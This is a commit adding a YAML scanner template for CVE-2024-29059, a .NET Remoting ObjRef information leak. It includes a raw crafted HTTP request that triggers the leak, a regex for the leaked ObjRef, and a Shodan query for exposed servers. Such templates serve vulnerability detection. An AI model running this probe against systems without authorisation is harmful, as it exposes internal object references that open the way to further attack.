Create CVE-2024-29059.yaml

patch-1
Dhiyaneshwaran 2024-03-28 18:47:52 +05:30 committed by GitHub
parent a7c488e65f
commit d5631938c3
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 37 additions and 0 deletions

View File

@ -0,0 +1,37 @@
id: CVE-2024-29059
info:
name: Leaking `ObjRefs` via HTTP .NET Remoting
author: DhiyaneshDk
severity: high
description: .NET Framework Information Disclosure Vulnerability
reference:
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-29059
- https://code-white.com/blog/leaking-objrefs-to-exploit-http-dotnet-remoting/
- https://github.com/codewhitesec/HttpRemotingObjRefLeak
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-29059
epss-score: 0.00043
epss-percentile: 0.07503
metadata:
max-request: 1
shodan-query: "Server: MS .NET Remoting"
tags: cve,cve2024,remoting,info-leak
http:
- raw:
- |+
GET /RemoteApplicationMetadata.rem?wsdl HTTP/1.1
Host: {{Hostname}}
__RequestVerb: POST
Content-Type: text/xml
unsafe: true
matchers:
- type: regex
part: body
regex:
- '/[0-9a-f_]+/[0-9A-Za-z_+]+_\d+\.rem'